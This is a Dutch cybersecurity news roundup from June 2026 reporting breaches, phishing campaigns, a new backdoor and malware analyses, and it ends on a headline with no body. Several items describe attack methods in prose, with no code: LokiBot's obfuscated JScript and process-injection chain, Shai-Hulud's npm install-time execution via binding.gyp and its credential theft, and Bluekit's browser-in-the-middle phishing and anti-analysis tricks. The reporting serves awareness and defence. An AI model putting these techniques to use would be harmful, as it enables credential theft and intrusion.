Als toezichthouder op onder andere de Cyberbeveiligingswet en de apparatuur die in Nederland op de markt komt, adviseert de RDI de organisaties onder haar toezicht om proactief te handelen. Organisaties dienen inzicht te hebben in de encryptie die zij momenteel gebruiken en te bepalen of deze kwetsbaar is voor de rekenkracht van quantumcomputers. Daarnaast is het essentieel om een duidelijk beeld te vormen van de data en systemen die bescherming behoeven. De RDI roept op om quantumrisico’s op te nemen in de algemene risicoanalyse en zich actief te oriënteren op de implementatie van quantumveilige cryptografie.

 

Bron: RDI

25 juni 2026 | Tata Electronics bevestigt cyberaanval en datalek door afpersingsgroep World Leaks

Tata Electronics, een producent van iPhones en componenten voor Apple, heeft bevestigd dat het enkele weken geleden slachtoffer is geworden van een cyberaanval. Volgens het bedrijf werd een deel van de IT infrastructuur getroffen, maar bleef de productie ononderbroken draaien. Tata Electronics benadrukt dat de aanval geen impact heeft gehad op de operationele activiteiten.

De bevestiging volgt nadat de afpersingsgroep World Leaks beweerde data van Tata Electronics te hebben gestolen en online te hebben geplaatst. De aanvallers stellen dat het gaat om interne bedrijfsbestanden en technische documentatie. Onder de gelekte gegevens zouden documenten zitten die verband houden met de productie van producten van Apple, waaronder schema's van componenten, ontwerpen van printplaten, specificaties van materialen en bestanden voor softwareontwikkeling.

World Leaks wordt beschouwd als de opvolger van de ransomwaregroep Hunters International. Deze groep stopte in 2025 met het versleutelen van systemen en schakelde over op pure data-afpersing. In plaats van bestanden ontoegankelijk te maken, richt de groep zich nu op het stelen van gegevens en het dreigen met publicatie wanneer slachtoffers niet betalen.

Tata Electronics heeft geen details gedeeld over de omvang van het incident of de manier waarop de aanvallers toegang kregen tot de systemen. Het bedrijf stelt dat de normale incidentresponsprocedures onmiddellijk zijn geactiveerd na de ontdekking van de aanval.

 

Bron: Tata Electronics

25 juni 2026 | Diefstal klantdata bij Klue begon met gestolen credential uit 2022

De data die aanvallers stalen uit de Salesforce omgevingen van klanten van marktonderzoeksbureau Klue, vond zijn oorsprong in een gestolen 'legacy credential'. Dit credential, dat in 2022 aan een derde partij was verstrekt, vormde de initiële toegangspoort voor de aanvallers. Klue heeft dit bevestigd in een eigen blogpost en in een verklaring aan TechCrunch. Door deze inbraak zijn diverse organisaties, waaronder vooraanstaande cybersecurity bedrijven, geconfronteerd met datalekken.

Klue biedt een 'market intelligence platform' dat bedrijven in staat stelt om hun Klue oplossingen te integreren met andere gebruikte platforms, zoals Salesforce, Slack en SharePoint. Deze integratie maakt het mogelijk dat data van klanten, bijvoorbeeld uit een Salesforce omgeving, beschikbaar wordt binnen het Klue platform voor verdere verwerking. Voor de koppeling tussen deze klantomgevingen en het Klue platform worden OAuth tokens gebruikt. De aanvallers die Klue wisten te compromitteren, slaagden erin deze tokens te stelen, waardoor ze ongeautoriseerde toegang kregen tot de Salesforce omgevingen en andere platforms van de getroffen klanten.

Onder de gedupeerde klanten bevinden zich meerdere IT- en cybersecurity bedrijven, waaronder Gong, Jamf, HackerOne, Insurity, OneTrust, Recorded Future, Snyk, Sprout Social en Tanium. Klue heeft in een blogpost aangegeven dat de hackers toegang verkregen via een 'legacy credential' van een integratiedienst. Tegenover TechCrunch specificeerde het bedrijf dat dit credential in 2022 was verstrekt aan een derde partij, als onderdeel van een "beperkte pilot".

Details over het exacte type credential, het doel en de duur van de pilot zijn niet openbaar gemaakt. Evenmin heeft Klue bekendgemaakt hoeveel klanten precies zijn getroffen door het datalek. Klue claimt meer dan 250.000 klanten te bedienen.

 

Bron: Klue | Bron 2: gong.io | Bron 3: jamf.com

26 juni 2026 | Nieuwe TinyRCT backdoor gebruikt door Chinese sprekende aanvallers tegen Zuidoost-Aziatische overheden

Palo Alto Networks' Unit 42 Threat Research Center heeft een gedetailleerd onderzoek gepubliceerd over een reeks cyberaanvallen die gericht zijn op overheidsinstanties en kritieke infrastructuur in Zuidoost-Azië gedurende 2025. De Chinese sprekende aanvallers, die door Unit 42 worden aangeduid als CL-STA-1062, zijn sinds ten minste maart 2022 actief en richten zich specifiek op staatsbedrijven in de energie- en overheidssectoren.

Dezelfde groep, eerder bekend als UAT-7237, werd in medio 2025 al gerapporteerd voor hun campagnes tegen webhosting infrastructuur in Taiwan. Eerdere operaties van CL-STA-1062 omvatten ook strategische sectoren in Oost-Azië, wat duidt op een brede en aanhoudende regionale focus.

Technisch gezien maakt de dreigingsactor CL-STA-1062 gebruik van een hybride set aan tools. Hoewel ze veelvuldig open source tools zoals SoftEther VPN, Mimikatz en VNT inzetten, hebben ze recentelijk een nieuwe, op maat gemaakte en voorheen ongedocumenteerde backdoor geïntroduceerd, genaamd TinyRCT.

De mogelijkheden van de TinyRCT backdoor omvatten:

*   Het uitvoeren van willekeurige commando's op geïnfecteerde systemen.

*   Het opsommen en exfiltreren van bestanden.

*   Het maken van schermafbeeldingen.

*   Een zelfvernietigingsmechanisme om sporen te wissen.

Palo Alto Networks heeft aangegeven dat hun klanten beschermd zijn tegen de besproken dreigingen via producten en diensten zoals Cortex XDR, XSIAM, Advanced WildFire, Advanced URL Filtering en Advanced DNS Security. Organisaties die een compromis vermoeden, kunnen contact opnemen met het Unit 42 Incident Response team. De ontdekking van TinyRCT benadrukt de voortdurende ontwikkeling van specifieke malware door geavanceerde dreigingsactoren.

 

Bron: Unit 42 | Bron 2: github.com | Bron 3: mastodon.social

26 juni 2026 | Bestel app Shop misbruikt voor effectievere callback-phishing

Dreigingsactoren maken toenemend misbruik van Shop, de bestel-app van Shopify, door valse aankoopbewijzen toe te voegen aan de bestelgeschiedenissen van gebruikers. Deze methode is erop gericht slachtoffers te verleiden tot het verstrekken van gevoelige gegevens of het installeren van software voor externe toegang.

De Shop app functioneert als een gecentraliseerd platform waar gebruikers bestellingen van diverse online retailers kunnen volgen, toegang hebben tot aankoopbewijzen en verzendupdates, en producten van Shopify-verkopers kunnen ontdekken en aanschaffen. De app is bijzonder populair in Noord-Amerika, met meer dan 50 miljoen downloads in Google Play en 7 miljoen beoordelingen in de Apple App Store.

Volgens onderzoek van het cybersecuritybedrijf Gen Digital voegen oplichters valse bestellingen in die tussen legitieme aankopen verschijnen. Hierbij doen ze zich voor als bekende merken zoals Norton, McAfee, Apple en PayPal. Op deze digitale aankoopbewijzen vermelden de dreigingsactoren een telefoonnummer dat gebruikers kunnen bellen om vermeende aankopen te betwisten. Aan de andere kant van de lijn bevindt zich echter een oplichter die zich voordoet als een ondersteuningsmedewerker.

Door middel van social engineering tactieken probeert de fraudeur het slachtoffer te overtuigen accountgegevens, gegevens van betaalkaarten en eenmalige authenticatiecodes (OTP's) te onthullen. In sommige gevallen worden slachtoffers zelfs misleid tot het installeren van software die de aanvallers externe toegang tot hun apparaat geeft.

De onderzoekers van Gen Digital merken op dat het invoegen van valse aankoopbewijzen in de Shop app een effectievere methode is dan het gebruik van e-mail voor frauduleuze aankoopmeldingen, een meer gangbare techniek die bekendstaat als callback-phishing. Aangezien Shop een legitieme app is, vertrouwen gebruikers deze van nature, waardoor bestellingen die daarin verschijnen veel eerder een reactie van nietsvermoedende gebruikers uitlokken. Desondanks bevatten veel van de valse aankoopbewijzen grammaticafouten, wat een duidelijk waarschuwingssignaal is. Gebruikers kunnen deze fouten echter over het hoofd zien wanneer ze een factuur voor een grote aankoop zien.

Het is nog onduidelijk hoe de valse aankoopbewijzen precies in de Shop app worden ingevoegd. Gen Digital stelt dat de app bestellingen vanuit meerdere bronnen kan verzamelen, waaronder e-mailparsing, accountassociatie en bestelworkflows, maar geen specifieke methode kon als leveringskanaal voor de frauduleuze meldingen worden bevestigd. Gen Digital benadrukt dat er geen bewijs is gevonden dat Shop, Shopify of een van de geïmiteerde bedrijven gecompromitteerd is.

Gebruikers die aankoopbewijzen zien voor bestellingen die zij niet hebben geplaatst, worden geadviseerd het vermelde telefoonnummer niet te bellen. In plaats daarvan dienen zij eventuele vermeende afschrijvingen direct bij hun bank te verifiëren. Degenen die reeds contact hebben gehad met de oplichters en gevoelige informatie hebben gedeeld, moeten onmiddellijk hun accountwachtwoorden resetten en contact opnemen met hun kaartuitgever voor annulering.

 

Bron: Gen Digital | Bron 2: apps.apple.com | Bron 3: hubs.li

26 juni 2026 | AI transformeert dreigingsinformatie en Windows COM misbruik neemt toe

De cybersecurity-industrie staat aan de vooravond van een transformatie door de integratie van kunstmatige intelligentie (AI) in dreigingsinformatie. Waar AI vaak wordt gezien als een tweesnijdend zwaard, biedt het verdedigers aanzienlijke voordelen in het beheren, indexeren en waardevol maken van dreigingsinformatie. Hoewel de sector uitblinkt in het gebruik van Indicators of Compromise (IOC’s) die tactisch van aard zijn, blijft het indexeren van de natuurlijke taal in strategische en operationele inlichtingenrapporten een uitdaging. Deze rapporten bieden de context die nodig is voor een zinvolle respons, maar zijn moeilijk te doorzoeken door inconsistente naamgeving van dreigingsactoren en disparate bronnen zoals incidentrapporten, darkweb monitoring en malware analyses.

Grote taalmodellen (LLM’s) kunnen dit probleem oplossen door synoniemen te identificeren en entiteiten te relateren over enorme, ongestructureerde datasets heen. Dit vergemakkelijkt het ophalen van relevante dreigingsinformatie en de generatie van specifiek advies ter bescherming tegen dreigingen. Belangrijk blijft echter de waakzaamheid over de waarheidsgetrouwheid van de data die LLM’s verwerken en de vertrouwelijkheid van de uitgevoerde zoekopdrachten. De ontwikkeling van persoonlijke, domeinspecifieke LLM’s belooft een wereld van geïntegreerde dreigingsinformatie, waarin relevante rapporten uit diverse bronnen gemakkelijk kunnen worden opgehaald en zelfs op vage vragen specifiek advies kan worden gegeven. AI kan zo een krachtig instrument zijn om toegang tot dreigingsinformatie te verbeteren en sneller gericht advies te bieden.

Cisco Talos benadrukt dat Windows dreigingen steeds vaker misbruik maken van het Component Object Model (COM) om kwaadaardige activiteiten uit te voeren. COM is een fundamentele Windows technologie voor legitieme interprocescommunicatie, maar malwarefamilies zoals Qakbot en WarmCookie kapen het voor laterale verplaatsing, persistentie en ontwijking. Dit misbruik is effectief omdat COM-functionaliteit afhankelijk is van ondoorzichtige GUID’s en indirecte vtable aanroepen, wat de intentie van de aanvaller verhult en handmatige analyse extreem arbeidsintensief maakt. Aanvallers houden van COM omdat het hen gemakkelijke toegang geeft tot ingebouwde Windows functionaliteit, terwijl statische analyse bemoeilijkt wordt. Door kwaadaardig gedrag te verbergen achter indirecte functie aanroepen, omzeilen aanvallers basiscontroles en vermengen ze zich met legitieme systeemeigen processen. Verdedigers moeten hun vaardigheden aanscherpen in het herkennen van COM-gebruik en het vertalen van bewijsmateriaal zoals ProgID’s en vtable offsets naar menselijk leesbare acties. Gespecialiseerde tools zoals OleView.NET, IDA’s COM Helper en DispatchLogger kunnen hierbij helpen. Beveiligingsteams moeten ook statische jachtlogica ontwikkelen om deze dreigingen te traceren.

In ander nieuws is gebleken dat de grootschalige FortiBleed campagne, gericht op Fortinet FortiGate apparaten, aangepaste sniffers gebruikte om authenticatiegegevens van gecompromitteerde firewalls te oogsten en inloggegevens te stelen. Dit werd gemeld door beveiligingsfirma SOCRadar. Daarnaast hebben twee mannen in het Verenigd Koninkrijk schuldig gepleit voor criminele aanklachten die voortvloeiden uit een cyberaanval in augustus 2024 die Transport for London trof. Zij waren betrokken bij de Scattered Spider hackers.

 

Bron: Cisco Talos | Bron 2: techcrunch.com | Bron 3: buzzsprout.com

26 juni 2026 | Nep-GTA 6 Early Access Sites Verspreiden Malware en Crypto Scams

Gamingliefhebbers wachten al meer dan tien jaar op Grand Theft Auto VI, sinds de release van het vorige deel in september 2013, waarvan uitgever Take-Two Interactive sindsdien 225 miljoen exemplaren heeft verkocht. De lange wachttijd heeft fans wanhopig gemaakt voor elk vleugje informatie over het vervolg, een situatie die cybercriminelen handig uitbuiten. Zij gebruiken de enorme hype rondom het spel om geld te stelen en computers te infecteren.

De securitybedrijven Malwarebytes en NordVPN hebben recentelijk een grote golf aan valse websites ontdekt die "VIP Early Access" tot het spel aanbieden. Deze sites zien er zeer professioneel uit en maken gebruik van echte GTA 6 logo's en Vice City-illustraties om slachtoffers te misleiden. Het betreft echter een geavanceerde valstrik. Dit is niet de eerste keer dat hackers deze tactiek toepassen; in 2024 meldde Hackread.com al dat onderzoekers van Bitdefender scammers ontmaskerden die via valse Facebook-advertenties en gelekte gameplaybeelden gebruikers lokten om nep-pc-bètaversies van Grand Theft Auto VI te downloaden.

De crypto-val werkt als volgt: om "de rij over te slaan", vragen de nep-pagina's kopers om ongeveer 250 dollar te betalen. De hackers accepteren echter alleen cryptocurrencies zoals Bitcoin, Ethereum of USDT. Zodra een slachtoffer het digitale geld heeft verzonden en de transactie-ID heeft ingevoerd om de download te ontgrendelen, is het geld verloren. Omdat cryptocurrency-betalingen geen terugboekingsproces of fraudeafdeling kennen, is het onmogelijk om het geld terug te krijgen. Slachtoffers klikken op de grote downloadknop op het scherm, om er vervolgens achter te komen dat er helemaal geen spel bestaat.

PC- en Android-spelers lopen momenteel het grootste risico. Rockstar Games heeft aangekondigd dat GTA 6 later dit jaar, op 19 november, wordt gelanceerd voor PlayStation 5 en Xbox Series X/S. Hoewel de officiële pre-orders op 25 juni zijn gestart, is er nog geen releasedatum voor computers of mobiele apparaten bekendgemaakt. Scammers richten zich specifiek op deze ontbrekende pc-versie door valse bèta-sleutels en bestanden aan te bieden. In plaats van een spel installeren deze bestanden echter verschillende soorten malware. Het downloaden van de nep-bestanden resulteert in de installatie van informatie-stelende malware, banking trojans, adware of ransomware op het apparaat. Rockstar Games heeft bevestigd dat er geen openbaar bètaprogramma beschikbaar is voor het spel. Gamers moeten zichzelf beschermen door tools te gebruiken die kwaadaardige sites blokkeren en door elk aanbod dat beweert het spel vóór november te verkopen, te negeren.

 

Bron: Malwarebytes en NordVPN

26 juni 2026 | Bluekit phishing kit gebruikt geavanceerde Browser-in-the-Middle techniek

Het Bluekit phishing-as-a-service platform blijft evolueren en heeft in de afgelopen week bijna zeventig nieuwe hostnamen geïdentificeerd. Bovendien heeft het platform Browser-in-the-Middle (BitM) functionaliteiten toegevoegd voor verbeterde diefstal van inloggegevens. Dit platform werd in april voor het eerst gedocumenteerd door onderzoekers van Varonis en biedt een AI-assistent die meerdere grote taalmodellen ondersteunt, waaronder Llama, GPT-4.1, Claude, Gemini en DeepSeek, voor het opstellen van phishing-e-mails. Destijds bood de phishing kit klanten veertig verschillende templates die gericht waren op populaire online diensten zoals Outlook, Hotmail, Gmail, Yahoo, ProtonMail, iCloud, GitHub en Ledger.

Een nieuw rapport van het digitale risicobeschermingsbedrijf Netcraft waarschuwt dat Bluekit is overgestapt van een adversary-in-the-middle mechanisme naar een BitM-mechanisme. Dit nieuwe mechanisme maakt gebruik van de open-source JavaScript-bibliotheek 'rrweb' om het DOM (Document Object Model) van de pagina te serialiseren en via een WebSocket-verbinding naar het slachtoffer te streamen. Bij een BitM-aanval interageert het slachtoffer met een browsersessie die door de aanvaller wordt gecontroleerd. Deze sessie laadt de legitieme inlogpagina en geeft verzoeken en antwoorden door tussen het slachtoffer en de doeldienst. Netcraft merkt op dat rrweb zelf een legitiem project is dat veel wordt gebruikt voor sessie-replay en analyse, en dat de aanwezigheid ervan in een webomgeving niet moet worden geïnterpreteerd als een indicator van compromis zonder een bredere context.

Afbeeldingen, lettertypen en CSS worden via de phishing-infrastructuur opgehaald, terwijl de invoer van het slachtoffer wordt doorgestuurd naar de browser van de aanvaller. De onderzoekers stellen dat rrweb is gekozen vanwege de uitstekende visuele getrouwheid, real-time interactiviteit en bandbreedte-efficiëntie. Er is echter nog steeds enige latentie, dus eventuele vertragingen bij toetsenbordinvoer en muisklikken op inlogpagina's moeten als waarschuwingssignalen worden beschouwd. Authenticatie wordt voltooid in de browser van de aanvaller, waardoor deze een geldige sessie-token en onbeperkte toegang tot het account van het slachtoffer krijgt.

De BitM-aanvalsmethode is al sinds 2022 bekend, bedacht door onderzoeker mr.d0x en later overgenomen voor kwaadaardige activiteiten. Voordat Bluekit de inloggegevens steelt, gebruikt het een uitgebreid systeem voor slachtofferkwalificatie om echte doelwitten te onderscheiden van onderzoekers of beveiligingscrawlers. De anti-analyse systemen in de nieuwste Bluekit omvatten gerandomiseerde CSS-filters om detectie op basis van screenshots te omzeilen, een grote (meer dan 1 MB) en frequent veranderende geobfusceerde JavaScript-bundel, een aangepaste CAPTCHA die Cloudflare of het doelwitmerk kan imiteren, browser-fingerprinting (RAM, CPU cores, schermresolutie, taal, detectie van headless browsers en anti-fingerprinting extensies), en WebRTC-gebaseerde IP-mismatch detectie om gebruikers achter proxies of VPN's te identificeren.

Netcraft meldt ook dat het live monitoringsysteem (met een update-interval van vijf seconden) dat Varonis eerder documenteerde, nog steeds beschikbaar is in Bluekit. Dit stelt operators in staat om slachtoffers te monitoren terwijl ze verstrikt raken in misleidende inlogsessies en hun acties na het inloggen te volgen. Het rapport van de onderzoekers biedt een reeks indicatoren en signalen die geassocieerd worden met Bluekit, maar geen indicatoren van compromis vormen. Deze omvatten CSS-filtermanipulatie op top-level HTML-elementen met gerandomiseerde waarden, een geobfusceerde JavaScript-bundel die periodiek wordt geroteerd, browser-fingerprint controles, een WebSocket-verbinding die versleutelde of binaire gegevens verzendt op inlogpagina's, en WebRTC IP-mismatch detectie op de landingspagina.

 

Bron: Netcraft | Bron 2: event.on24.com | Bron 3: hubs.li

26 juni 2026 | Nieuwe LokiBot-campagne steelt inloggegevens met geavanceerde technieken

LokiBot, een van de oudste nog actieve malwarefamilies voor het stelen van inloggegevens, is opnieuw opgedoken in een campagne met meerdere fasen. Deze campagne is ontworpen om inloggegevens te stelen uit een breed scala aan applicaties. De aanval maakt gebruik van een e-mailbijlage met JScript als toegangspunt, wat een keten van gebeurtenissen in gang zet die resulteert in het ongemerkt verzamelen van gevoelige data van het systeem van het slachtoffer.

Wat deze heropleving opmerkelijk maakt, is de manier waarop de aanvallers oudere technieken combineren met nieuwere ontwijkingsmethoden om detectie te omzeilen. LokiBot werd voor het eerst aangeboden in mei 2015 op een ondergronds forum door dreigingsactoren bekend als "lokistov" en "carter". Na het lekken van de broncode in 2018 zijn er meerdere varianten ontstaan, waardoor de malware werd uitgebreid met ondersteuning voor Android, keylogging en toegang op afstand. Tegenwoordig kan de malware inloggegevens stelen die zijn opgeslagen in meer dan honderd applicaties, waaronder browsers, cryptowallets, e-mailclients en FTP-tools.

Analisten van LevelBlue identificeerden deze recente campagne en merkten op hoe de aanvallers elke fase zorgvuldig hebben geconstrueerd om blootstelling te beperken en bewijsmateriaal te vernietigen als er iets misgaat. LevelBlue meldde in een rapport dat het voorbeeld werd verspreid als een kwaadaardige e-mailbijlage, wat de meest frequent gerapporteerde leveringsmethode voor LokiBot blijft. De betaalbaarheid en het gebruiksgemak maakten het ooit een favoriet onder minder bekwame cybercriminelen, en de voortdurende aanwezigheid in dreigingsfeeds toont aan dat de malware nog steeds wordt onderhouden.

De bredere impact van een succesvolle LokiBot-infectie is ernstig. Zodra de malware zijn routines voor het verzamelen van inloggegevens heeft voltooid, comprimeert het de gestolen data met aPLib en verzendt deze naar een command-and-controlserver, waarvan het adres met 3DES-encryptie in het binaire bestand is opgeslagen. Vanaf dat moment krijgen aanvallers toegang tot wachtwoorden en accountgegevens van tientallen applicaties, waardoor individuen en organisaties een reëel risico lopen op accountovername en diefstal van data.

De aanval begint wanneer een slachtoffer een phishing-e-mail ontvangt met een JScript-bestand als bijlage. Het openen van het bestand zorgt ervoor dat Windows het uitvoert via het ingebouwde Windows Script Host-programma. Het script is zwaar geobfusceerd met lokfuncties en hexadecimaal benoemde variabelen om analyse te vertragen. Eenmaal uitgevoerd, decodeert het script een Base64-gecodeerd PowerShell-script, slaat het op in de map C:\Temp met een willekeurige bestandsnaam en voert het uit. Als een gedefinieerde time-out wordt overschreden, ruimt het script op door processen te beëindigen en zijn eigen bestanden te verwijderen.

De PowerShell-fase ontsleutelt vervolgens een .NET-assembly payload met XOR en een hardgecodeerde sleutel, en laadt deze direct in het geheugen zonder naar schijf te schrijven. De geladen .NET-assembly, beschermd met de ConfuserEx-obfuscator, fungeert als injector. Het spawnt een legitiem proces van aspnet_compiler.exe, wijst er geheugen in toe en schrijft de uiteindelijke LokiBot-payload in die ruimte. Deze techniek voor procesinjectie stelt de malware in staat om binnen een vertrouwd Windows-proces te draaien, waardoor het moeilijker te detecteren is.

Eenmaal actief creëert LokiBot een mutex met de MD5-hash van de unieke register-ID van de machine om ervoor te zorgen dat er slechts één instantie tegelijk draait. Het doorloopt vervolgens een lijst van speciale functies voor het verzamelen van inloggegevens, elk gericht op een specifieke applicatie, waarbij ongemerkt gebruikersnamen en wachtwoorden worden verzameld in browsers, e-mailclients en meer. De malware probeert ook persistentie te bewerkstelligen via een register-run-sleutel, maar nieuwere voorbeelden die met aangepaste builders zijn gemaakt, bevatten een defect persistentiemechanisme als gevolg van een gepatchte decryptieprocedure. Om verborgen te blijven, importeert LokiBot de meeste Windows API-functies niet direct, maar lost deze op tijdens runtime met behulp van een aangepaste hashingtechniek.

Organisaties kunnen het risico verminderen door e-mailbijlagen op basis van scripts te blokkeren, te letten op onverwacht gebruik van aspnet_compiler.exe en gedragsgebaseerde endpointbeveiliging in te schakelen die patronen van reflectieve loading en procesinjectie detecteert. Indicatoren van compromis (IoC's) zijn beschikbaar, hoewel IP-adressen en domeinen opzettelijk zijn "defanged" om onbedoelde resolutie of hyperlinks te voorkomen.

 

Bron: LevelBlue

26 juni 2026 | Shai-Hulud payload steelt ontwikkelaarsgegevens via malafide npm pakketten

Een nieuwe golf van kwaadaardige npm pakketten richt zich op ontwikkelaars die werken met cloud- en serverloze infrastructuur. De dreiging, bekend als de Shai-Hulud payload die deel uitmaakt van de Hades malwarefamilie, heeft nu ook het Leo/RStreams ecosysteem bereikt. Dit ecosysteem omvat bibliotheken die veel worden gebruikt voor AWS-native event streaming en datapijplijnen. Beveiligingsteams luiden de noodklok, aangezien de aanval gevoelige ontwikkelaarsgegevens stilzwijgend steelt zodra een pakket is geïnstalleerd.

Wat deze campagne bijzonder gevaarlijk maakt, is de diepte van de aanval. Wanneer een ontwikkelaar een van de getroffen pakketten installeert, begint de payload met het verzamelen van referenties die zijn opgeslagen in bestanden, omgevingsvariabelen, shell-geschiedenis, tokens voor GitHub CLI, cloud-toegangssleutels en geheimen van CI/CD-pijplijnen. Het werkt op de achtergrond en stuurt alles wat het vindt naar GitHub-repositories die door aanvallers worden beheerd.

De omvang van de blootstelling is aanzienlijk. De getroffen pakketten registreerden ongeveer 45.000 downloads in slechts één maand, wat betekent dat duizenden ontwikkelaars mogelijk al zijn getroffen zonder dit te weten. Analisten van JFrog Security Research identificeerden deze nieuwe golf en publiceerden hun bevindingen in een rapport. Onderzoeker Yair Benamou merkte op dat dit geen volledig nieuwe dreiging is, maar een voortzetting van dezelfde campagne, met dezelfde functionaliteit voor het stelen van referenties, maar met nieuwe doelwitten en bijgewerkte markeringen.

De Leo/RStreams bibliotheken staan centraal in cloud-native ontwikkelworkflows. Ze omwikkelen AWS-diensten zoals Kinesis, S3, Lambda en DynamoDB, wat betekent dat elke ontwikkelaar die deze tools installeert, waarschijnlijk werkt in een omgeving die rijk is aan cloud-referenties en implementatietokens. Deze positionering betekent dat een enkele gecompromitteerde installatie veel meer kan blootstellen dan alleen de werkplek van één ontwikkelaar. Deze nieuwste golf bevestigt dat de Shai-Hulud operatie nog steeds actief is en blijft groeien. In plaats van nieuwe malware vanaf nul te bouwen, recyclen de aanvallers een bewezen payload en richten ze deze op nieuwe, vertrouwde pakketfamilies. Verdedigers die alleen vertrouwen op oude campagnenamen of verouderde handtekeningen, zullen deze waarschijnlijk volledig missen.

De kwaadaardige pakketten gebruiken een slimme truc voor levering die hen helpt basisbeveiligingsscanners te omzeilen. In plaats van schadelijke code in de standaard npm installatiescripts te plaatsen die de meeste tools controleren, verbergen de aanvallers de uitvoering in een bestand genaamd `binding.gyp`. Wanneer npm een pakket met dit bestand vindt en geen expliciet installatiescript, wordt automatisch `node-gyp` uitgevoerd, dat shell-commando's verwerkt die in dat bestand zijn ingebed. Dit geeft de aanvaller een manier om code uit te voeren tijdens de installatie, terwijl ze onder de radar blijven.

Eenmaal actief verzamelt de payload referenties uit een breed scala aan bronnen op de machine van de ontwikkelaar. Het richt zich op GitHub-tokens, npm- en PyPI-publicatiereferenties, AWS-toegangssleutels, JFrog- en Artifactory-tokens en SSH-sleutels. Alle gestolen gegevens worden verpakt in versleutelde bestanden en geëxfiltreerd door repositories te creëren met een gestolen GitHub-token en de resultaten daar te committen, een techniek die bekend staat als een GitHub dead drop.

De payload stopt niet bij het stelen van referenties tijdens de installatie. Het plaatst verschillende persistentiehaken om actief te blijven, lang na de initiële installatie. Het configureert zichzelf als een systemd-service op Linux of een LaunchAgent op macOS, terwijl het ook koppelingen maakt met ontwikkeltools met AI door configuratiebestanden te wijzigen voor tools zoals Cursor, Copilot en Gemini. Gevonden SSH-sleutels op de gecompromitteerde machine worden gebruikt om laterale beweging te proberen naar andere systemen waartoe de ontwikkelaar toegang heeft. De payload injecteert zichzelf ook in workflows van GitHub Actions om geheimen van pijplijnen te dumpen. Eén geïnfecteerde installatie op één machine kan zich verspreiden naar team-repositories, cloud-accounts en productie-pijplijnen.

JFrog beveelt aan om getroffen machines en CI-runners te isoleren voordat alle referenties worden geroteerd. Alle persistentie-artefacten, inclusief de monitor service, haken voor tools met AI en verdachte workflow-bestanden, moeten eerst worden verwijderd. Na de opschoning moeten alle GitHub-, npm-, cloud-, SSH-, Docker- en pakketregisterreferenties worden geroteerd. GitHub- en npm-accounts moeten ook worden gecontroleerd op onverwachte repositories, pakketreleases of verdachte workflow-wijzigingen. Indicatoren van Compromis (IoC's) omvatten kwaadaardige npm pakketversies, indicatoren voor netwerk en service, indicatoren voor host en persistentie, en indicatoren voor repositories en workflows.

 

Bron: JFrog Security Research | Bron 2: research.jfrog.com

26 juni 2026 | Malware misbruikt Component Object Model (COM) voor diverse aanvalsdoeleinden

Het Component Object Model (COM), een fundamentele technologie van Windows, wordt door legitieme applicaties gebruikt voor objectactivatie, communicatie tussen processen, automatisering en taalonafhankelijk hergebruik van componenten. Deze eigenschappen maken COM echter ook aantrekkelijk voor cybercriminelen, zo blijkt uit onderzoek van Vanja Svajcer van Cisco Talos. Malware maakt veelvuldig gebruik van COM-interfaces voor laterale verplaatsing binnen netwerken, uitvoering van kwaadaardige code, downloaden en exfiltratie van data, persistentie, ontwijking van detectie, systeemverkenning en automatisering van ingebouwde functionaliteit van Windows en Office.

De analyse van COM-functionaliteit in binaire uitvoerbare bestanden is doorgaans arbeidsintensief voor beveiligingsonderzoekers. Het vereist dat zij ondoorzichtige GUID's (Globally Unique Identifiers) en indirecte vtable-aanroepen omzetten naar betekenisvolle klassen, interfaces en methodenamen. Dit onderzoek, dat eerder werd gepresenteerd op de AVAR 2025-conferentie en een CARO 2026-workshop, benadrukt de noodzaak om deze techniek beter te begrijpen.

COM fungeert als een applicatiebinaire interface (ABI) voor het hergebruiken van softwarecomponenten. COM-objecten stellen interfaces beschikbaar aan clientapplicaties, die door diverse programmeertalen kunnen worden gebruikt. Dit komt doordat het contract op binair interfaceniveau bestaat, en niet op het niveau van een specifieke taalruntime. Microsoft omschrijft COM als een gedistribueerd, objectgeoriënteerd systeem voor het creëren van binaire softwarecomponenten die met elkaar kunnen communiceren. Het is tevens de basis voor technologieën zoals OLE en ActiveX.

De taalonafhankelijkheid van COM is duidelijk zichtbaar in veelvoorkomende scripting- en automatiseringspatronen. Eenzelfde COM-object kan worden gecreëerd vanuit VBScript, PowerShell, Python of C/C++. Zo kan een script het WScript.Shell COM-object instantiëren en gebruiken om registerwaarden te lezen of te schrijven, een commando uit te voeren, snelkoppelingen te creëren of omgevingsvariabelen te benaderen, en dit op een vergelijkbare wijze met verschillende scripttalen die COM-automatisering ondersteunen.

Distributed COM (DCOM) breidt dit model uit, waardoor een client COM-objecten op een ander systeem kan activeren en gebruiken. De lokale client communiceert met een proxy, de externe server stelt een stub beschikbaar, en de COM-runtime transporteert de methode-aanroep via Microsoft RPC. De aanwezigheid van de CoCreateInstanceEx API in een binair bestand, met de juiste parameters, kan gebruikt worden om onderscheid te maken tussen lokale COM en DCOM. DCOM is ook expliciet vertegenwoordigd in MITRE ATT&CK als een techniek, beschreven onder Remote Services: Distributed Component Object Model, T1021.003.

Klassen en interfaces zijn twee fundamentele COM-concepten. COM-klassen zijn sjablonen voor het creëren van COM-objecten en worden geïdentificeerd door een klasse-identifier (CLSID), een GUID die de component uniek identificeert. Een GUID is een 128-bits identifier die wordt gebruikt om COM-gerelateerde objecten en interfaces uniek te identificeren. De stringweergave van een GUID is gebruikelijk in het Windows-register, scripts en configuratietekst. Malwarefamilies assembleren vaak dynamisch GUID-structuren op de stack om analyse te bemoeilijken. Interfaces worden eveneens vertegenwoordigd door interface-identifiers (IID's), die ook het GUID-datatypen hebben. Interfaces definiëren methoden die een object aan clients blootstelt. De fundamentele COM-interface is IUnknown, die functies als QueryInterface, AddRef en Release beschikbaar stelt. Alle COM-interfaces zijn uiteindelijk hiervan afgeleid. COM-registratiegegevens worden opgeslagen in het Windows-register, waarbij klassen onder HKEY_CLASSES_ROOT\CLSID en interface-registraties onder HKEY_CLASSES_ROOT\Interface te vinden zijn.

 

Bron: Cisco Talos | Bron 2: learn.microsoft.com

27 juni 2026 | Artificiële intelligentie faciliteert grootschalige verzekeringsfraude in België

